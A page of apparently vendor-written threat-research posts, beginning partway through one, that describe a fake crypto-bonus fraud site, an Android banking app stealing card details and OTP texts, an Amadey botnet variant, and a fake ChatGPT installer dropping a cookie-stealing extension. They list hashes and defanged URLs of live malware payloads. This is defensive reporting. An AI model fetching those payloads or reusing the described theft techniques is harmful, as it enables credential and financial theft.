All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

Fig: News, Settings, Chat & History

It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.

Fig: Collect BTC Bonuses

After clicking the “Collect Bitcoin Bonuses” button it shows a progress bar as if mining is going on the system with fake transaction hashes.

Fig: Fake mining

Once the progress bar reaches 100% it shows collected BTC and a get paid button.

Fig: BTC collection

After clicking get paid it asks for the user’s personal details along with account/card details.

Fig: User's details

After getting all the details shows forwarding the details to the manager and they have their own chatbot which says details are verified without any validation even if random input is given.

Fig: Chatbot

Then for currency exchange, it redirects to BTC pay & the user has to pay in bitcoin.

Fig: BTCPay

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

June 26, 2023/by

android, infostealer, malware, mobile security

Minimal permissions are adequate for fraudulent Android financial applications

SonicWall Capture Labs Threat research team recently discovered a campaign requesting users to provide their card details on a fraudulent bank application under the pretense of claiming rewards points. Additionally, they persuade users to enable SMS-related permissions, the fraudulent application gains the capability to intercept and redirect One-Time Password (OTP) messages to the attackers' server, giving them unauthorized access to the user's banking credentials and potentially leading to fraudulent activities or financial loss.

The fraudulent app's icon may closely resemble the original app's icon in terms of color scheme, logo, and overall visual elements. This resemblance creates a false sense of trust and familiarity for unsuspecting users. They may not immediately recognize any visual discrepancies and may proceed with providing their card details without suspicion.

Fig1: Legitimate & malicious apps icon

Infection cycle:

The fraudulent apps utilize two crucial permissions.

SMS permission: to read and identify incoming messages (2 Factor authentication for the bank).
INTERNET permission: to establish an internet connection and send the collected card and SMS details to the attacker's server.

After installation it proceeds to prompt the user to fill in their card details, enticing them with the promise of claiming rewards.

Fig2: Card details with random values

Fig3: Prompt for Card details

Fig4: Prompt for Card details

Fig5: Checks for SMS permission

Once the user shares their card details with the fraudulent app, it immediately initiates the process of transmitting this sensitive information to the attacker's C&C server.

Fig6: Sharing card details with C&C server

Storing the user and card information in a local database located within the application system folder.

Fig7: Application system folder

Fig8: Storing user info in a local database

Read incoming messages on a device and save them in JSON format.

Fig9: Read incoming SMS

Fig10: Stores SMS info in a JSON format

It shares incoming message details with the C&C server.

Fig11: Sends SMS info to the C&C server

The file is detected by only a few security vendors on the popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential.

Fig12: VirusTotal image

SonicWall Capture Labs provides protection against this threat via the SonicWall Capture ATP w/RTDMI.

Indicators of Compromise (IOC):

01dad4cb5fd433b1138078d39d7ced11229d22971acc4ba71bb03eb09e5b702b

0901a1d1b25ed81a6100d5e9e4a8363e9a638e45ae4a418d80e78189c01510ec

14732a80ea580c54b88780c3346b95a58d1dad80e1ed60800018c76746caa421

17ccf51b19072810490319b20d5d337c9621405e443c73fa2ec96c8d04038d6c

1825679fb5840bd63002a28656a69bd6bac120cb3d0d2dee9c396b198b5db109

35eeaeea8d91cc999456d4f86330ea03beed3c53274c1525f541341b2a46bf4e

36c61e92e4f991339340d9b89a891c5c74ef043ee362df5173e8e50c617f1372

6e9f03a81be3b29be22f769b6a00e4f8ee5220884959d91c84906e163dbb592c

6ff0c6f8b54142b76d6acc3a1f7e2dc5fc9955bb92b4adea86e8d3e69c0f9399

8f088d49c70b1d64b3ab8df0b2e4e527d1bad8865cf609bc0801acfbf3b1bd15

9cf21cfb921658c85ec63c362bfb71c5137e56c93caeab9ec0b2798bcbeeea6f

cec60348cf2be5400b37597ba8903453f12aef5a936aabad85cce13320cc59ee

ddfe903d31c87f49c02fbb4e5b63351964e55c8ef12a8fa5500e5471236d10f2

e740a368bbfc74b32eddfe57282094100a66a7a11f31181a262c40914e9449dd

ec409e8f9bb9d19b786e3e0f99f863d97da8465b7b2569bbd88a83f4ec439880

f9d94528bdb34628c9169bc3770c8d087afd5793d47247eb84e7fa60ead17534

June 21, 2023/by

infostealer, malware, news, spotlight

Amadey Malware Has Improved Its String Decoding Algorithm

OVERVIEW

SonicWall Capture Labs Research team recently observed a new variant of Amadey malware. Amadey is a botnet with main objective of stealing sensitive information and to inject additional payload by receiving the commands from command & control server. In this variant we observed that it has modified its string decoding algorithm.

In this blog post, we will discuss.

Introduction to Amadey malware.
Command & control server communication.
New string decoding algorithm.

INTRODUCTION

Since Amadey’s initial discovery in October 2018, the Amadey botnet has been operational. Amadey is mostly propagated by exploit kits like RigEK and Fallout EK. Amadey version found in current sample is 3.83.

Fig 1: Amadey CnC Login Panel

C2 COMMUNICATION

Malware starts collecting victim’s system information and initiate communication with CnC server by sending collected information. Victim’s System Information includes compute name, username, operating system, domain name, installed anti-virus vendor, system architecture and admin privilege present or not.

In response to send request, CnC can send URL to download additional malware. In this variant, it is seen distributing Redline stealer malware. Amadey sends requests to download two data stealing plugins of names cred.dll & clip64.dll.

Fig 2: Downloads add-on Plugins

STRINGS OBFUSCATION

Malware stores all the used strings like CNC domain address, AV product names, DLL file names, registry keys used for persistence, API names, URL parameters etc. Encoded strings are present in “.rdata” section of malware.

Fig 3: Some of Encoded Strings

HARD CODED KEY

Fig 4: Hardcoded Decryption key, Mutex name, Amadey ID

IMPROVED STRING ENCODING ALGORITHM

Fig 5: Pseudocode of string decoding algorithm

DECODED STRINGS

Fig 6: Some of Decoded strings

CONCLUSION

Amadey is botnet developed in C++ with main objective of stealing victims’ sensitive information. Amadey has capabilities to inject modules received from CnC which also makes it a downloader. Malware is using custom decoding algorithm to hide the strings.

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: MalAgent.OLA_2 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

IOC’s:

hxxp://77[.]91[.]68[.]30/DSC01491/foto124[.]exe

hxxp://77[.]91[.]68[.]30/DSC01491/fotod25[.]exe

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/clip64[.]dll

hxxp://77[.]91[.]68[.]30/music/rock/Plugins/cred32[.]dll

SHA256

dcda87129c5d1687d208553663943bde1fb19ca3942fccf99da672d4f6cb3fea -> Amadey Malware

5cfeac2fad035a1a351abd2d5734dcb858583fdbdb9cf7f9383f5c809593fe96 -> foto125.exe

a2f989a5f3fcfef29366f7f469c39636dc3505da5ad44953cdd58829813c1d6f -> foto124.exe

340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 -> cred64.dll

June 15, 2023/by

infostealer, malware, news, spotlight

Fake ChatGPT installs an infostealer

With the popularity of ChatGPT, an artificial intelligence (AI) chatbot, cybercriminals has been using it to lure unsuspecting victims to online scams. Recently, the Sonicwall Capture Labs Research team has come across a scam promising the most powerful version of this AI chatbot only to install an infostealer.

Infection Cycle:

This so called better version of ChatGPT is hosted on a website that promises the download of its AI tool which outperforms and is more advanced than ChatGPT.

The website even links to the promotional Youtube video of the legitimate ChatGPT-4 from the original developer, OpenAI.

fake chatgpt website

The user gets a password- protected RAR archive from the download link on this malicious website. This password is conveniently provided on the website and upon execution runs a Microsoft software installer file (msi).

The rar archive and the msi file use the following file names:

ChatGPT4_V2_3.3_Setup.rar
ChatGPT4 V2 3.3 Setup.msi

It opens a popup box that will guide the user to a seemingly legitimate program installation.

fakeinstallbox

It drops the following files in the program files directory:

Upon completed installation, it opens the chrome browser to OpenAI's real website which will lead the victim to believe that the real ChatGPT from the original developer was installed.

openaiwebsite

But silently, it spawned the command prompt to run the batch file named gpt4.bat which started the Chrome browser and loaded a browser extension named "dmkamcknogkgcdfhhbddcghachkejeapgpt4."

gpt4.bat

To hide its real intent and to make it sound benign, this malicious extension is named "Google Translate."

fake google extension

googleextensiondetails

After careful examination of the original file that was installed as a browser extension we found that it was an obfuscated javascript file whose primary function is to steal facebook cookies presumably to use stolen credentials to further this online scam.

SonicWall Capture Labs provides protection against this threat via the following signatures:

GAV: Fake.GPT (Trojan)
GAV: Fakechrome.EXT (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

June 9, 2023/by